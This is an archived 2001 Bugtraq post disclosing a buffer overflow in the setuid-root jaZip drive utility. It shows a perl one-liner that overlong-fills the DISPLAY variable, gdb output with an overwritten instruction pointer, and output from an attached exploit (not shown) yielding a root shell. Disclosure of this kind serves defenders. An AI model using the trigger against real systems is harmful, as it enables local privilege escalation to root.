Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Vulnerability in jaZip.

From: teleh0r <teleh0r () DOGLOVER COM>
Date: Sun, 14 Jan 2001 17:05:48 +0000
Dear, Bugtraq.

jaZip is a program for managing an Iomega Zip or Jaz drive.
It is often installed setuid root - and because of a buffer
overflow it is possible for regular users to become root.

Please excuse me if this was know. Please note that I can not
guarantee that this information is correct.

Tested rpm:
ftp://ftp.linux.com/pub/mirrors/turbolinux/turbolinux/TurboLinux/
RPMS/jaZip-0.32-2.i386.rpm

  [root@localhost /root]# export DISPLAY=`perl -e '{print "A"x"2100"}'`
  [root@localhost /root]# gdb /usr/X11R6/bin/jazip
  GNU gdb 19991004
  Copyright 1998 Free Software Foundation, Inc.
  (gdb) r
  Starting program: /usr/X11R6/bin/jazip

  Program received signal SIGSEGV, Segmentation fault.
  0x41414141 in ?? ()
  ----
  [teleh0r@localhost teleh0r]$ rpm -q jaZip
  jaZip-0.32-2
  [teleh0r@localhost teleh0r]$ ./jazip-exploit.pl
  Address: 0xbffff7ac
  bash#

Exploit attached.

Sincerely yours,
teleh0r

--
To avoid criticism, do nothing, say nothing, be nothing.
                -- Elbert Hubbard

Attachment: jazip-exploit.pl
Description:

Previous By Date Next
Previous By Thread Next

Current thread: